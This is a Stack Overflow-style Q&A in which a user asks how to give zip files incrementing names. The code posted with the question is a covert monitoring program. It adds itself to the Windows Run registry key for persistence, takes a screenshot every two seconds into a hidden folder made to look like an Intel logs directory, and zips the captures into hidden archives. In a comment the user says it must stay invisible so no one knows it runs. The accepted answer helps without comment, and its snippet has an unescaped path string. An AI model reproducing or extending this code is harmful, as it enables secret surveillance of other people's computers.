# How do I code my program to create new file name for every new file in a directory?

Tags: c#

I have a program which takes the files from a specified folder every 2 hours and zips them into a zip file that then saves in another folder. As is, the code will create a zip file with the name "zip", but then when it goes to create a second zip file 2 hours later it won't be able to because a file with the name "zip" already exists. I would like to know how to make it so that the code sees that there is already a file named "zip" and names the new zip file "zip2" then "zip3", "zip4" so on and so forth. I know that this function is already in my code earlier on for the screenshots, but I didn't write that part of the code and am very confused as to how I can take it from that part and apply it to this part.

Thank you very much for all the help. Please ask me to clarify if you have any questions.

Here is my code:

```
using System;
using System.Threading;
using System.Reflection;
using System.IO;
using System.Drawing;
using System.IO.Compression;

namespace chrome
{
    static class Program
    {
        static void Main()
        {
            //-----this code will make your program to automatically execute as computer starts----
            try
            {
                Microsoft.Win32.RegistryKey key = Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
                Assembly curAssembly = Assembly.GetExecutingAssembly();
                key.SetValue(curAssembly.GetName().Name, curAssembly.Location);
                Console.WriteLine(curAssembly.GetName());

            }
            catch (Exception e)
            {
                Console.WriteLine("show1:" + e.Message);
            }
            //------------------

            //------------screenshot  loop takes screenshots after 1 min-----------
            int n = 0;
            while (n == 0)
            {
                try
                {

                    OnTimedEvent();
                    Thread.Sleep(2000);
                }
                catch (Exception e)
                {
                    Console.WriteLine("show2:" + e.Message);
                }
                //-------------------------

            }
        }// main body ends !

        public static string st = "";
        public static string date = "";
        public static string month = "";
        public static string year = "";
        public static string time = "";
        public static string hour = "";
        public static string min = "";
        public static string sec = "";


        private static void OnTimedEvent()
        {
            st = DateTime.Today.Date.ToString();
            time = DateTime.Now.TimeOfDay.ToString();

            hour = DateTime.Now.Hour.ToString();
            min = DateTime.Now.Minute.ToString();
            sec = DateTime.Now.Second.ToString();

            date = DateTime.Today.Day.ToString();
            month = DateTime.Today.Month.ToString();
            year = DateTime.Today.Year.ToString();

            Console.WriteLine("The Elapsed event was raised at {0}_{1}_{2} at time {3}_{4}_{5} ", date, month, year, hour, min, sec);

            Bitmap memoryImage;
            memoryImage = new Bitmap(1366, 768);
            Size s = new Size(memoryImage.Width, memoryImage.Height);

            // Create graphics
            Graphics memoryGraphics = Graphics.FromImage(memoryImage);
            // Copy data from screen
            memoryGraphics.CopyFromScreen(0, 0, 0, 0, s);
            string str = "";

            //------------creating directory--------
            if (Directory.Exists("C:\\Intel\\Logs\\dsp"))
            {
                Console.WriteLine("directory exits");
            }
            else
            {
                Directory.CreateDirectory("C:\\Intel\\Logs\\dsp");
                File.SetAttributes("C:\\Intel\\Logs\\dsp", FileAttributes.Hidden);
                Console.WriteLine("new directory created");
            }
            //---------------------------------------

            str = string.Format("C:\\Intel\\Logs\\dsp\\{0}_{1}.png", date + month + year, hour + min + sec);

            //------------

            try
            {
                memoryImage.Save(str);
            }
            catch (Exception er)
            {
                Console.WriteLine("Sorry, there was an error: " + er.Message);
            }

            {
                string startPath = @"c:\example\start";
                string zipPath = @"c:\example\result.zip";

                ZipFile.CreateFromDirectory(startPath, zipPath);

                File.SetAttributes(zipPath, File.GetAttributes(zipPath) | FileAttributes.Hidden);
            }
        }
    }
}
```

Comment: you could get the number of .zip files in the directory already, add one to that number and format the number into the filename of the new zip file.

Comment: Note that the Visual Studio tags should only be used when your question is about VS itself.

Comment: @CodexNZ Could you give me an example code?

Comment: @Amy Really? Sorry, I didn't know that. Thanks for letting me know! I won't add it anymore.

Comment: Yup.  Refer to the [tag description](https://stackoverflow.com/questions/tagged/visual-studio-2017).  Each of the VS tags has some variant of that phrasing.

Answer (score 1, accepted):

I have modified inline to your code (from bottom of above excerpt):

```
try
        {
            memoryImage.Save(str);
        }
        catch (Exception er)
        {
            Console.WriteLine("Sorry, there was an error: " + er.Message);
        }

        {
            string startPath = @"c:\example\start";
            string zipPath = @"c:\example\result.zip";

// start of directory logic you need to calculate the number of existing files in the directory you are about to put the new zip
  string[] filenames = Directory.GetFiles("path_to_your_directory_of_zip_files");
  int count = filenames.Length;

  if (count > 0)
    zipPath = string.Format("c:\example\result_{0}.zip", count);

//End of new logic 

  // then do your saving using the new filename...
  ZipFile.CreateFromDirectory(startPath, zipPath);
```

Looking at the code above, you are using Thread.Sleep to wait for a file to be produced. Can I suggest you look into [FileSystemWatcher](https://msdn.microsoft.com/en-us/library/system.io.filesystemwatcher(v=vs.110).aspx) class which will tell you when files arrive, are deleted or modified etc. This will allow you to react in an asynchronous way instead of blocking your thread for a specified period which may or may not be long enough for things to be as you expect.

Comment: So- going from the end of my code- would it be like [this](https://ibb.co/mxiFhQ)?

Comment: Also, a big limiter on my program is that it has to be invisible so that no one knows it's running.

Comment: Your code looks fine (from image). Not sure what the extra { } are around the block of code though...maybe remove them to help readability..

Comment: I just ran the code finally and it threw an exception. `Exception thrown: 'System.IO.IOException' in System.IO.Compression.FileSystem.dll
An unhandled exception of type 'System.IO.IOException' occurred in System.IO.Compression.FileSystem.dll
The file 'c:\Intel\Logs\result.zip' already exists.`

Comment: This is because you are trying to create a file that already exists. Step through in your debugger to see if the Directory.GetFiles() call is returning what you expect (and see in your File Explorer) which will help you figure out why it is trying to create a file with the same name as one that already exists instead of adding a number into the filename...